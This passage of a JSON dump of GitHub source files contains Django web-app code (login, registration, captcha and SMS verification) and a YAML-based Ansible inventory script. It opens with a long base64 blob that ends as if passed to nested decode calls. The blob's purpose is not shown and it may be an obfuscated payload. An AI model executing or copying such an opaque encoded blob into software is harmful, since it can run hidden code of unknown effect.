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')))\n"
}
] | 1 |
CoopG/clinical-data-dashboard | https://github.com/CoopG/clinical-data-dashboard | 7b83a4621a7ea20cde661d95e41604b3b5f2e320 | bac14448015d355faeb880b757a1b19b83ac853e | 6bee7f0b5170c594e3f15f37a9cefdd576947848 | refs/heads/master | 2020-04-07T14:34:58.049459 | 2018-11-20T21:54:45 | 2018-11-20T21:54:45 | 158,452,947 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7283950448036194,
"alphanum_fraction": 0.7283950448036194,
"avg_line_length": 15.199999809265137,
"blob_id": "e0432a34ce6ad906864a2eea0aac3271045b3319",
"content_id": "37d60ed47705ad55dffb0018d84f3d0965cd0c97",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 81,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 5,
"path": "/cdd/apps.py",
"repo_name": "CoopG/clinical-data-dashboard",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass CddConfig(AppConfig):\n name = 'cdd'\n"
},
{
"alpha_fraction": 0.8399999737739563,
"alphanum_fraction": 0.8399999737739563,
"avg_line_length": 25,
"blob_id": "80c04359e48a09cb7ee4a805d37509541e59b508",
"content_id": "f620965d5d0518b479dee2a3ddc665ada9a64061",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 25,
"license_type": "permissive",
"max_line_length": 25,
"num_lines": 1,
"path": "/README.md",
"repo_name": "CoopG/clinical-data-dashboard",
"src_encoding": "UTF-8",
"text": "# clinical-data-dashboard"
}
] | 2 |
yktimes/yk_go | https://github.com/yktimes/yk_go | 94313f7a6fcbff3251788aac352320ec9ec83807 | 4f3b10694bbba5585b373de6a6e0f794b3d9ce2b | 1ff3a8eff7e162d2c86ebfa84c4d2fa70f2fa3a6 | refs/heads/master | 2022-12-13T23:46:29.092592 | 2019-08-05T07:16:20 | 2019-08-05T07:16:20 | 200,196,710 | 0 | 0 | null | 2019-08-02T08:27:25 | 2019-08-05T07:23:24 | 2022-12-04T05:44:49 | CSS | [
{
"alpha_fraction": 0.6917510628700256,
"alphanum_fraction": 0.6917510628700256,
"avg_line_length": 30.363636016845703,
"blob_id": "4b3a8904d1ac264b6b60912b32db4a1f68a5554b",
"content_id": "9c018189c46246491285035ccc81049fee2c0292",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 703,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 22,
"path": "/apps/cms/urls.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "\nfrom django.urls import path\n\nfrom . import views\nfrom django.conf import settings\n\napp_name =\"cms\" # 应用命名空间\n\nurlpatterns = [\n path('', views.index,name='index'),\n path('write_news/', views.WriteNewView.as_view(),name='write_news'),\n path('news_category/', views.news_category,name='news_category'),\n\n path('add_news_category/',views.add_news_category,name='add_news_category'),\n\n path('edit_news_category/', views.edit_news_category, name='edit_news_category'),\n path('delete_news_category/', views.delete_news_category, name='delete_news_category'),\n\n\n path('upload_file/',views.upload_file,name='upload_file'),\n\n path('qntoken/', views.qntoken, name='qntoken')\n]\n"
},
{
"alpha_fraction": 0.6232091784477234,
"alphanum_fraction": 0.642192006111145,
"avg_line_length": 32.55421829223633,
"blob_id": "cbd53797bf01c358bc66358ed4c3273e58efd336",
"content_id": "f4881118fa72743ccd86bcd044af97a840089fc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3090,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 83,
"path": "/apps/ykauth/forms.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom apps.forms import FormMixin\nfrom .models import User\nfrom django_redis import get_redis_connection\nimport re\nfrom utils import restful\n\nclass LoginForm(forms.Form,FormMixin):\n telephone= forms.CharField(max_length=11)\n password = forms.CharField(max_length=20,min_length=6,error_messages={\n \"max_length\":\"密码最多不能超过20个字符\",\n \"min_length\":\"密码不能少于6个字符\"\n })\n remember = forms.IntegerField(required=False)\n\n\nclass RegisterForm(forms.Form,FormMixin):\n telephone = forms.CharField(max_length=11)\n username = forms.CharField(max_length=20)\n password1 = forms.CharField(max_length=20, min_length=6, error_messages={\n \"max_length\": \"密码最多不能超过20个字符\",\n \"min_length\": \"密码不能少于6个字符\"\n })\n password2 = forms.CharField(max_length=20, min_length=6, error_messages={\n \"max_length\": \"密码最多不能超过20个字符\",\n \"min_length\": \"密码不能少于6个字符\"\n })\n img_captcha = forms.CharField(min_length=4, max_length=4,error_messages={\n \"max_length\": \"只允许4个字符\",\n \"min_length\": \"只允许4个字符\"\n })\n sms_captcha = forms.CharField(min_length=6, max_length=6,error_messages={\n \"max_length\": \"只允许6个数字\",\n \"min_length\": \"只允许6个数字\"\n })\n\n\n def clean(self):\n cleaned_data = super(RegisterForm, self).clean()\n\n password1 = cleaned_data.get('password1')\n password2 = cleaned_data.get('password2')\n username = cleaned_data.get('username')\n telephone = cleaned_data.get('telephone')\n img_captcha = cleaned_data.get('img_captcha')\n sms_captcha = cleaned_data.get('sms_captcha')\n\n if not all([username,password2,password1,telephone,img_captcha,sms_captcha]):\n raise forms.ValidationError(\"参数不允许为空\")\n\n\n if not re.match(r'^1[3-9]\\d{9}$', telephone):\n\n raise forms.ValidationError('手机号格式错误')\n\n if password1 != password2:\n raise forms.ValidationError('两次密码输入不一致!')\n\n\n\n\n redis_conn = get_redis_connection('img_captcha')\n cached_img_captcha = redis_conn.get(img_captcha.lower())\n print(\"1111\",cached_img_captcha)\n print(111,cached_img_captcha)\n if not cached_img_captcha or cached_img_captcha.decode().lower() != img_captcha.lower():\n raise forms.ValidationError(\"图形验证码错误!\")\n\n exists = User.objects.filter(telephone=telephone).exists()\n if exists:\n raise forms.ValidationError('该手机号码已经被注册!')\n\n\n # 判断短信验证码\n redis_conn = get_redis_connection('verify_codes')\n\n real_sms_code = redis_conn.get('sms_%s' % telephone)\n if real_sms_code is None:\n raise forms.ValidationError('无效的短信验证码')\n if sms_captcha != real_sms_code.decode():\n raise forms.ValidationError('短信验证码错误')\n\n return cleaned_data\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7037887573242188,
"alphanum_fraction": 0.7210103273391724,
"avg_line_length": 25.393939971923828,
"blob_id": "c354ba76c37a600934301f32eff65eef1c11cb47",
"content_id": "c90122731344775e2b4dedfcbbe432569a9b127d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 871,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 33,
"path": "/utils/restful.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "from django.http import JsonResponse\n\nclass HttpCode:\n ok=200\n paramserror = 400\n unauth=401\n methoderror=405\n servererror=500\n\ndef result(code=HttpCode.ok,message=\"\",data=None,kwargs=None):\n json_dict={\"code\":code,\"message\":message,\"data\":data}\n\n if kwargs and isinstance(kwargs,dict) and kwargs.keys():\n json_dict.update(kwargs)\n\n return JsonResponse(json_dict)\n\ndef ok():\n return result()\n\ndef params_error(message=\"\",data=None):\n return result(code=HttpCode.paramserror,message=message,data=data)\n\n\ndef unauth(message=\"\",data=None):\n return result(code=HttpCode.unauth, message=message, data=data)\n\ndef method_error(message=\"\",data=None):\n return result(code=HttpCode.methoderror, message=message, data=data)\n\n\ndef server_error(message=\"\",data=None):\n return result(code=HttpCode.servererror, message=message, data=data)\n"
},
{
"alpha_fraction": 0.6881720423698425,
"alphanum_fraction": 0.6881720423698425,
"avg_line_length": 33.875,
"blob_id": "bdb768dabe9c8f89580b9b49175c4b0bdb9aa3d4",
"content_id": "a29da0b41f25c187e066732734f9b841aeca7616",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 558,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 16,
"path": "/yk_go/urls.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "from django.urls import path,include\nfrom apps.news import views\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nurlpatterns = [\n path('', views.index,name=\"index\"),\n\n path('cms/', include(\"apps.cms.urls\")),\n path('account/', include(\"apps.ykauth.urls\")),\n\n path('news/', include(\"apps.news.urls\")),\n path('course/', include(\"apps.course.urls\")),\n path('payinfo/', include(\"apps.payinfo.urls\")),\n path('ueditor/',include('apps.ueditor.urls'))\n\n]+static(settings.MEDIA_URL,document_root = settings.MEDIA_ROOT)\n"
},
{
"alpha_fraction": 0.6689655184745789,
"alphanum_fraction": 0.6689655184745789,
"avg_line_length": 13.399999618530273,
"blob_id": "ac28dc1c3a87a776a9db2cdf59005fcc095b4c65",
"content_id": "1bb3b714f4165a049a2a83d9eb59947265a655fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 157,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 10,
"path": "/apps/payinfo/urls.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "\nfrom django.urls import path\nfrom . import views\n\napp_name =\"payinfo\" # 应用命名空间\n\nurlpatterns = [\n\n path('', views.payinfo,name='payinfo'),\n\n]\n"
},
{
"alpha_fraction": 0.6603773832321167,
"alphanum_fraction": 0.6603773832321167,
"avg_line_length": 20.100000381469727,
"blob_id": "a3048252591d6c6d391f9c19953b5a9c5c5fbf41",
"content_id": "6b72a69baecbcd393fa6e4eda9c5ee4bf5b4d051",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 224,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 10,
"path": "/apps/news/urls.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "\nfrom django.urls import path\nfrom . import views\n\napp_name =\"news\" # 应用命名空间\n\nurlpatterns = [\n\n path('<int:news_id>/', views.news_detail,name='news_detail'),\n path('search/', views.search,name='search'),\n]\n"
},
{
"alpha_fraction": 0.6997971534729004,
"alphanum_fraction": 0.6997971534729004,
"avg_line_length": 19.58333396911621,
"blob_id": "783da3fbb6b06a3e204c6a7f0c60f1ce2ad7300c",
"content_id": "7b37890fd0ebb1f0d6c8edde4fbaef5581ef36a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 493,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 24,
"path": "/apps/news/views.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom .models import NewsCategory,News\n# Create your views here.\n\n\ndef index(request):\n\n newes = News.objects.all()\n categories = NewsCategory.objects.all()\n\n context={\n 'newes':newes,\n 'categories':categories\n }\n\n return render(request,\"news/index.html\",context=context)\n\n\ndef news_detail(request,news_id):\n return render(request,\"news/news_detail.html\")\n\n\ndef search(request):\n return render(request,\"search/search.html\")"
},
{
"alpha_fraction": 0.6322140693664551,
"alphanum_fraction": 0.6392969489097595,
"avg_line_length": 26.43165397644043,
"blob_id": "364d86c977342a26a3384d6ffe8bb6211e3bef76",
"content_id": "1af66806c3fe0f09b76c01bdfef9980f6c082fe7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4160,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 139,
"path": "/apps/ykauth/views.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth import login,logout,authenticate\nfrom django.views.decorators.http import require_POST\nfrom .forms import LoginForm,RegisterForm\nfrom django.http import JsonResponse\nfrom utils import restful\nfrom django.shortcuts import redirect,reverse\nfrom utils.captcha.ykzcaptcha import Captcha\nfrom io import BytesIO\nfrom django.http.response import HttpResponse\n\nfrom django_redis import get_redis_connection\nfrom utils.aliyunsdk import aliyunsms\nimport re\nfrom . import constants\nfrom django.contrib.auth import get_user_model\nimport random\n\n\nUser = get_user_model()\n\n@require_POST\ndef login_view(request):\n form = LoginForm(request.POST)\n if form.is_valid():\n telephone = form.cleaned_data.get(\"telephone\")\n password = form.cleaned_data.get(\"password\")\n remember = form.cleaned_data.get(\"remember\")\n\n user = authenticate(request,username=telephone,password=password)\n\n if user:\n if user.is_active: # 正常用户\n login(request,user)\n if remember:\n request.session.set_expiry(None) # 默认使用2个星期\n else:\n request.session.set_expiry(0) # 退出浏览器清除session\n\n return restful.ok()\n\n else: # 说明该用户是黑名单用户\n\n return restful.unauth(message=\"您的账号被冻结,请联系管理员\")\n else:\n return restful.params_error(message=\"账号或密码错误\")\n\n else:\n errors = form.get_errors()\n print(\"login\",errors)\n return restful.params_error(message=errors)\n\n\ndef logout_view(request):\n logout(request)\n return redirect(reverse(\"index\"))\n\n@require_POST\ndef register(request):\n form = RegisterForm(request.POST)\n if form.is_valid():\n telephone = form.cleaned_data.get('telephone')\n username=form.cleaned_data.get('username')\n password = form.cleaned_data.get('password2')\n user = User.objects.create_user(\n telephone=telephone,\n username=username,\n password=password\n )\n print(user)\n login(request,user)\n\n return restful.ok()\n\n else:\n print(form.get_errors())\n return restful.params_error(message=form.get_errors())\n\n\n\ndef img_captcha(request):\n text,image = Captcha.gene_code()\n # BytesIO:相当于一个管道,用来存储图片的流数据\n out = BytesIO()\n # 调用image的save方法,将这个image对象保存到BytesIO中\n image.save(out,'png')\n # 将BytesIO的文件指针移动到最开始的位置\n out.seek(0)\n\n response = HttpResponse(content_type='image/png')\n # 从BytesIO的管道中,读取出图片数据,保存到response对象上\n response.write(out.read())\n response['Content-length'] = out.tell()\n\n # 12Df:12Df.lower()\n redis_conn = get_redis_connection('img_captcha')\n redis_conn.setex(text.lower(), constants.SMS_CODE_REDIS_EXPIRES,text.lower())\n\n\n return response\n\n\n\ndef sms_captcha(request):\n telephone = request.GET.get(\"telephone\")\n\n\n\n # ret = re.match(r\"^1[35678]\\d{9}$\", telephone)\n\n if telephone:\n\n # 保存短信验证码与发送记录\n redis_conn = get_redis_connection('verify_codes')\n # 判断图片验证码, 判断是否在60s内\n send_flag = redis_conn.get(\"send_flag_%s\" % telephone)\n if send_flag:\n return restful.params_error(message=\"请求次数过于频繁\")\n\n # 生成短信验证码\n sms_code = \"%06d\" % random.randint(0, 999999)\n\n pl = redis_conn.pipeline()\n pl.setex(\"sms_%s\" % telephone, constants.SMS_CODE_REDIS_EXPIRES, sms_code)\n pl.setex(\"send_flag_%s\" % telephone, constants.SEND_SMS_CODE_INTERVAL, 1)\n pl.execute()\n\n try:\n\n result = aliyunsms.send_sms(telephone,sms_code)\n print(result)\n\n return restful.ok()\n\n\n except Exception as e:\n return restful.params_error(message=\"网络错误\")\n\n else:\n return restful.params_error(message=\"请填写正确的手机号码\")"
},
{
"alpha_fraction": 0.681614339351654,
"alphanum_fraction": 0.681614339351654,
"avg_line_length": 23.66666603088379,
"blob_id": "eb81c5e4472d5eca99fe915b6c907e3910f350f5",
"content_id": "f79648eb6f00799e6de49952d841e709f6a1cac9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 235,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 9,
"path": "/apps/course/urls.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "\nfrom django.urls import path\nfrom . import views\n\napp_name =\"course\" # 应用命名空间\n\nurlpatterns = [\n path('', views.course_index,name='course_index'),\n path('<int:course_id>', views.course_detail,name='course_detail'),\n]\n"
},
{
"alpha_fraction": 0.6842105388641357,
"alphanum_fraction": 0.7368420958518982,
"avg_line_length": 15,
"blob_id": "b741201ed0bc4050161fa0d987583fee2857d17e",
"content_id": "9a0e3bfe8a4cb56ee1b30df318f3365a5949a65c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 135,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 6,
"path": "/apps/ykauth/constants.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "# redis中短信验证码有效时间: s\nSMS_CODE_REDIS_EXPIRES = 300\n\n\n# 发送短信时间间隔限制: s\nSEND_SMS_CODE_INTERVAL = 60"
}
] | 10 |
ecanuto/inventory.py | https://github.com/ecanuto/inventory.py | 188b4cde77f7fabd623ff2079f78e513e2e598ae | c1495e9556451e44697891a03c62ccdb916edcb0 | aacedc56e4b3fe695ba6fcfe38e622d20f47b4aa | refs/heads/master | 2021-01-04T23:53:07.921429 | 2020-02-16T00:25:00 | 2020-02-16T00:25:00 | 240,804,579 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5411807298660278,
"alphanum_fraction": 0.5455539226531982,
"avg_line_length": 27,
"blob_id": "776d0cb5909bd73d9e7f535b280533e7aaa6c8cb",
"content_id": "afc8ccb64f0d624dd922e8658f7b10ea26b688c2",
"detected_licenses": [
"Unlicense"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2744,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 98,
"path": "/inventory.py",
"repo_name": "ecanuto/inventory.py",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n#\n# 2020 February 15 - Everaldo Canuto\n#\n# I dedicate any and all copyright interest in this software to the\n# public domain. I make this dedication for the benefit of the public at\n# large and to the detriment of my heirs and successors. I intend this\n# dedication to be an overt act of relinquishment in perpetuity of all\n# present and future rights to this software under copyright law.\n#\n\n\nimport argparse\nimport pathlib\nimport json\nimport yaml\n\n\n__prgdesc__ = \"Simplified YAML Ansible inventory\"\n__version__ = \"0.1\"\n\n\nclass SimplifiedAnsibleInventory(object):\n\n def __init__(self):\n parser = argparse.ArgumentParser(description=__prgdesc__)\n\n parser.add_argument(\"-v\", \"--version\", action=\"version\",\n version=\"%(prog)s \" + __version__)\n\n parser.add_argument(\"-l\", \"--list\", action=\"store_true\",\n help=\"output inventory\")\n\n parser.add_argument(\"-H\", \"--host\", action=\"store\",\n help=\"output host vars\")\n\n args = parser.parse_args()\n\n self.parse_yaml()\n\n if args.list:\n self.output_list()\n\n if args.host:\n self.output_host(args.host)\n\n def print_json(self, data):\n print(json.dumps(data or {}, indent=4, sort_keys=False))\n\n def parse_yaml(self):\n self.groups = {}\n self.hosts = {}\n\n filename = pathlib.Path(__file__).stem + \".yml\"\n\n with open(filename) as file:\n data = yaml.load(file, Loader=yaml.FullLoader)\n\n for entry in data:\n if entry.get(\"name\"):\n self.groups[entry.get(\"name\")] = entry\n if entry.get(\"host\"):\n self.hosts[entry.get(\"host\")] = entry\n\n for name, host in self.hosts.items():\n tags = host.get(\"tags\") or [\"ungrouped\"]\n for tag in tags:\n if not tag in self.groups:\n self.groups[tag] = {}\n\n group = self.groups[tag]\n if not \"hosts\" in group:\n group[\"hosts\"] = []\n\n group[\"hosts\"].append(name)\n\n def output_list(self):\n inventory = {}\n for name, group in self.groups.items():\n inventory[name] = {}\n if name != \"all\":\n inventory[name][\"hosts\"] = group[\"hosts\"]\n if \"vars\" in group:\n inventory[name][\"vars\"] = group[\"vars\"]\n\n self.print_json(inventory)\n exit(0)\n\n def output_host(self, name):\n hostvars = {}\n if name in self.hosts:\n hostvars = self.hosts[name].get(\"vars\")\n\n self.print_json(hostvars)\n exit(0)\n\nif __name__ == \"__main__\":\n SimplifiedAnsibleInventory()\n"
},
{
"alpha_fraction": 0.8367347121238708,
"alphanum_fraction": 0.8367347121238708,
"avg_line_length": 23.5,
"blob_id": "b897c0d72402a4b7df28e2ab451468fe711c4c7e",
"content_id": "d0e2c245cc378b39d6b04c651b1e670c4d2b85e1",
"detected_licenses": [
"Unlicense"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 49,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ecanuto/inventory.py",
"src_encoding": "UTF-8",
"text": "# inventory.py\nSimplified YAML Ansible inventory\n"
}
] | 2 |
entropyfeng/autoSign | https://github.com/entropyfeng/autoSign | c8b8cc53167562813d1be73e1b6d884928545bfc | 820dc3d735675adddb348bc295e7298f213a9aa1 | 266572205628d34cac95ed4477d8797b35a24483 | refs/heads/master | 2020-04-09T04:41:27.706394 | 2018-12-06T13:01:02 | 2018-12-06T13:01:02 | 160,032,300 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8032786846160889,
"alphanum_fraction": 0.8032786846160889,
"avg_line_length": 11.199999809265137,
"blob_id": "e2869b3845a8d93f1587dcd68a65d7aa4b2298bb",
"content_id": "f8b6e4b2258372f0b82c42453f41fd1fe2b958b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 115,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 5,
"path": "/README.md",
"repo_name": "entropyfeng/autoSign",
"src_encoding": "UTF-8",
"text": "# autoSign\n基于python的自动签到\n### Tips\n在电脑端上运行该程序\n手机扫码登陆后,获取token\n"
},
{
"alpha_fraction": 0.7049180269241333,
"alphanum_fraction": 0.7072599530220032,
"avg_line_length": 25.75,
"blob_id": "64acbaf6a324e80214cc24093c2a9d370018f633",
"content_id": "5c93748a096dbaa0ab097e8abcd335164bfce1e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 427,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 16,
"path": "/getSome.py",
"repo_name": "entropyfeng/autoSign",
"src_encoding": "UTF-8",
"text": "import requests, clientlib,urllib\nURL = \"https://www.5idream.net/activity/activity/myjoin\"\nheaders = {'dmkj_web_token':'7a61c2f75cdf47b58144c49f2d8b3862190092','x-requested-with':'XMLHttpRequest'}\nhttpsConn = None\n\n\n\ndef request_method():\n print(headers)\n response= requests.post(URL,headers = headers,verify=False)\n print(response.text)\n print(response.request.headers)\n print(response.request.body)\n\nif __name__ =='__main__':\n request_method()"
}
] | 2 |
alex-mocanu/OSSS | https://github.com/alex-mocanu/OSSS | 5b9e5655613705c68bf15311773f834ac8e67e76 | b6a92fa7d8555f29c709c98be69958625fece3f5 | 0b57969b2016a8de43f41c7012bfceba5600969d | refs/heads/master | 2020-04-27T17:28:07.890738 | 2015-06-30T08:11:34 | 2015-06-30T08:11:34 | 37,975,895 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.43478259444236755,
"alphanum_fraction": 0.45974233746528625,
"avg_line_length": 29.292682647705078,
"blob_id": "e19e90604e12f17cb97642845a0efc955129b81a",
"content_id": "200f2e6c6ab21f00c6af117d18087a8c4deafe42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1242,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 41,
"path": "/Python/note_teste.py",
"repo_name": "alex-mocanu/OSSS",
"src_encoding": "UTF-8",
